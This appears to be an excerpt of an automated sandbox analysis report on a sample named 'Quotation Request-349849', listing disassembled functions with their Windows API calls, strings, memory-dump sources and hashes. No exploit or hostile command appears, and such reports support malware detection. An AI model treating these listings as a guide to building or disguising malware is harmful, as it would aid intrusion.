                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0084508C
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00845097
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 008450A2
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 008450AD
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008450B8
                                                      • GetCursorInfo.USER32(?), ref: 008450C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$Info
                                                      • String ID:
                                                      • API String ID: 2577412497-0
                                                      • Opcode ID: e1c1848be457c8f9b166aa2b5b7ec21fa045713f8e9c3735a091442428ac4c37
                                                      • Instruction ID: 997fe6e1eb9c921a81d3d544e311fc3293e142cc926b46427233681baff9b9c5
                                                      • Opcode Fuzzy Hash: e1c1848be457c8f9b166aa2b5b7ec21fa045713f8e9c3735a091442428ac4c37
                                                      • Instruction Fuzzy Hash: D831E1B1D4871DABDF109FB68C8996EBFF8FB08750F50452AA50DE7281DA78A5008E91
                                                      Function 0085A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0085A259
                                                      • DestroyWindow.USER32(?,?), ref: 0085A2D3
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0085A34D
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0085A36F
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A382
                                                      • DestroyWindow.USER32(00000000), ref: 0085A3A4
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 0085A3DB
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A3F4
                                                      • GetDesktopWindow.USER32 ref: 0085A40D
                                                      • GetWindowRect.USER32(00000000), ref: 0085A414
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0085A42C
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0085A444
                                                        • Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: edb2cedfc79be1dcb20b7e7d9350bb84de48d06624f1aea9cd098876668641db
                                                      • Instruction ID: c64be27598351ec0b6f97be045be8f5a8fa8bdb690cc66e43f5ad2b608a249fd
                                                      • Opcode Fuzzy Hash: edb2cedfc79be1dcb20b7e7d9350bb84de48d06624f1aea9cd098876668641db
                                                      • Instruction Fuzzy Hash: E471DC70140204AFD729DF28CC88FA67BE5FB88705F08062DF985D72A1D775E906CB52
                                                      Function 0085C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 0085C627
                                                        • Part of subcall function 0085AB37: ClientToScreen.USER32(?,?), ref: 0085AB60
                                                        • Part of subcall function 0085AB37: GetWindowRect.USER32(?,?), ref: 0085ABD6
                                                        • Part of subcall function 0085AB37: PtInRect.USER32(?,?,0085C014), ref: 0085ABE6
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0085C690
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0085C69B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0085C6BE
                                                      • _wcscat.LIBCMT ref: 0085C6EE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0085C705
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0085C71E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0085C735
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0085C757
                                                      • DragFinish.SHELL32(?), ref: 0085C75E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0085C851
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 70f5f4497745a76170c61cb5f453d329c9939ea3eff932f37906bedead146c54
                                                      • Instruction ID: 5059c6125e5ffe664d2572dd06f31e1bff8898972f010ac07b95803cff4f243b
                                                      • Opcode Fuzzy Hash: 70f5f4497745a76170c61cb5f453d329c9939ea3eff932f37906bedead146c54
                                                      • Instruction Fuzzy Hash: CB615071108300AFC701EF54CC85DABBBF9FF99751F00092EF695962A1DB74A549CB52
                                                      Function 00854392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00854424
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0085446F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 6f8ce909c4f039848a59da409c4f084a91511afac66766f2e4fff387ce28c543
                                                      • Instruction ID: 78b2aee523b5f55cec890cee52b0c204873fdf7fd184015f8a3c5a7deec9ac79
                                                      • Opcode Fuzzy Hash: 6f8ce909c4f039848a59da409c4f084a91511afac66766f2e4fff387ce28c543
                                                      • Instruction Fuzzy Hash: 1E9189302007018BCB04EF20C455A6EB7E1FF95758F048869FD969B3A2DB34EC89CB82
                                                      Function 0085B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0085B8B4
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008591C2), ref: 0085B910
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085B949
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0085B98C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085B9C3
                                                      • FreeLibrary.KERNEL32(?), ref: 0085B9CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0085B9DF
                                                      • DestroyIcon.USER32(?,?,?,?,?,008591C2), ref: 0085B9EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0085BA0B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0085BA17
                                                        • Part of subcall function 007F2EFD: __wcsicmp_l.LIBCMT ref: 007F2F86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      • Opcode ID: da93a75769ae833a071e5853b9891ba53c1440a47331bc4792beec92520b8f95
                                                      • Instruction ID: d450bab3d9d7ba42ec894369385b4a19e2410c94a66d8ceeea4fd4da3363e977
                                                      • Opcode Fuzzy Hash: da93a75769ae833a071e5853b9891ba53c1440a47331bc4792beec92520b8f95
                                                      • Instruction Fuzzy Hash: 5061EF71900219FAEB14DF64CC4AFBE7BA8FB18722F104116FE15D61C1EB789994DBA0
                                                      Function 0083DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 0083DCDC
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0083DCEC
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0083DCF8
                                                      • __wsplitpath.LIBCMT ref: 0083DD56
                                                      • _wcscat.LIBCMT ref: 0083DD6E
                                                      • _wcscat.LIBCMT ref: 0083DD80
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DD95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDA9
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDDB
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DDFC
                                                      • _wcscpy.LIBCMT ref: 0083DE08
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0083DE47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: ba6c40120373025bbc47490353680291760ad0801f7a63589a18082732ca9ad0
                                                      • Instruction ID: add47950bbf5ca028bfe803e354901080961dc252d454a198361ffb1c0c6b466
                                                      • Opcode Fuzzy Hash: ba6c40120373025bbc47490353680291760ad0801f7a63589a18082732ca9ad0
                                                      • Instruction Fuzzy Hash: 8E6147B25043459FCB10EF64D8449AEB3E8FF89314F04492EEA89D7351DB35EA45CB92
                                                      Function 00839C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00839C7F
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00839CA0
                                                      • __swprintf.LIBCMT ref: 00839CF9
                                                      • __swprintf.LIBCMT ref: 00839D12
                                                      • _wprintf.LIBCMT ref: 00839DB9
                                                      • _wprintf.LIBCMT ref: 00839DD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-3080491070
                                                      • Opcode ID: 56eb185cb0712f4ffebf6b24a1f136d10f885586e0c9c22fb6fe9e59448395cc
                                                      • Instruction ID: 61c3ce687b269889276efc3f56f67157c5e9ab20a33e876b432a4406389936fe
                                                      • Opcode Fuzzy Hash: 56eb185cb0712f4ffebf6b24a1f136d10f885586e0c9c22fb6fe9e59448395cc
                                                      • Instruction Fuzzy Hash: 27515C31900509EACB19FBE4DD4AEEEB779FF14300F500066F505B22A2EB792E58CB61
                                                      Function 0083A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0083A3CB
                                                      • GetDriveTypeW.KERNEL32 ref: 0083A418
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A460
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A497
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A4C5
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 6094af4163f91e03b5231590de775a91e1120ac9850fbe4438c02352562228ae
                                                      • Instruction ID: 638b55c5f5aac107022b91110d6f95d6f928c49ca672115181830b3f28d40faf
                                                      • Opcode Fuzzy Hash: 6094af4163f91e03b5231590de775a91e1120ac9850fbe4438c02352562228ae
                                                      • Instruction Fuzzy Hash: 35510771104205DFC704EF24C99586AB7F4FF94718F50886EF89A973A2DB35AD09CB92
                                                      Function 0082F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0080E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0082F8DF
                                                      • LoadStringW.USER32(00000000,?,0080E029,00000001), ref: 0082F8E8
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • GetModuleHandleW.KERNEL32(00000000,00895310,?,00000FFF,?,?,0080E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0082F90A
                                                      • LoadStringW.USER32(00000000,?,0080E029,00000001), ref: 0082F90D
                                                      • __swprintf.LIBCMT ref: 0082F95D
                                                      • __swprintf.LIBCMT ref: 0082F96E
                                                      • _wprintf.LIBCMT ref: 0082FA17
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0082FA2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 748b33614983908ba0e31489286bc31629a300692464b5d44a192ecdab2cc2dd
                                                      • Instruction ID: ae64d83e763dfb849720813f8aee850b154287850debac6713b4f0cebfbbc6d2
                                                      • Opcode Fuzzy Hash: 748b33614983908ba0e31489286bc31629a300692464b5d44a192ecdab2cc2dd
                                                      • Instruction Fuzzy Hash: B441207290411DEACF08FBE4DD5ADEE7778EF14300F500466B605B6292EA396F49CB61
                                                      Function 0085BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00859207,?,?), ref: 0085BA56
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA6D
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA78
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA85
                                                      • GlobalLock.KERNEL32(00000000), ref: 0085BA8E
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BA9D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0085BAA6
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BAAD
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00859207,?,?,00000000,?), ref: 0085BABE
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00862CAC,?), ref: 0085BAD7
                                                      • GlobalFree.KERNEL32(00000000), ref: 0085BAE7
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0085BB0B
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0085BB36
                                                      • DeleteObject.GDI32(00000000), ref: 0085BB5E
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0085BB74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 8ea7ed4f128c7baa441b45ff529193b8eb3677396cbab5c472fb40c81c91508c
                                                      • Instruction ID: 901f3093e09268782ecc2b265a93e8a939ffc03853c3637df1b34055f4e7a6eb
                                                      • Opcode Fuzzy Hash: 8ea7ed4f128c7baa441b45ff529193b8eb3677396cbab5c472fb40c81c91508c
                                                      • Instruction Fuzzy Hash: 8C411875601208EFDB119F65DC88EABBBB9FF89722F104068FA09D7261D7749D05CB60
                                                      Function 0083D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0083DA10
                                                      • _wcscat.LIBCMT ref: 0083DA28
                                                      • _wcscat.LIBCMT ref: 0083DA3A
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DA4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DA63
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0083DA7B
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0083DA95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0083DAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 0f19306fe488e6516a6fa88fed48286e034ffcada488620ba09659919e3d0996
                                                      • Instruction ID: fdabb7b9bf8f6b7e4749a9f417ff1ac9d479dba8df53cd96123acef3daa9cb63
                                                      • Opcode Fuzzy Hash: 0f19306fe488e6516a6fa88fed48286e034ffcada488620ba09659919e3d0996
                                                      • Instruction Fuzzy Hash: D081B2725043449FCB20EF64D844AAABBE8FFC9714F14882EF889C7251E734E945CB92
                                                      Function 0085C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0085C1FC
                                                      • GetFocus.USER32 ref: 0085C20C
                                                      • GetDlgCtrlID.USER32(00000000), ref: 0085C217
                                                      • _memset.LIBCMT ref: 0085C342
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0085C36D
                                                      • GetMenuItemCount.USER32(?), ref: 0085C38D
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0085C3A0
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0085C3D4
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0085C41C
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0085C454
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0085C489
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 668db5b1935d40bf94cdd163cf08f2b6110ac225263e981e1268c930f9f909ff
                                                      • Instruction ID: bf74989911d5ec498ab936aac550e3f2b5ebe66c1594cc1333b59615a2476c3f
                                                      • Opcode Fuzzy Hash: 668db5b1935d40bf94cdd163cf08f2b6110ac225263e981e1268c930f9f909ff
                                                      • Instruction Fuzzy Hash: 66816A70208305AFD711DF14C894AAABBE4FB88716F00492EFA95D7292D770D909CF92
                                                      Function 0084731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0084738F
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0084739B
                                                      • CreateCompatibleDC.GDI32(?), ref: 008473A7
                                                      • SelectObject.GDI32(00000000,?), ref: 008473B4
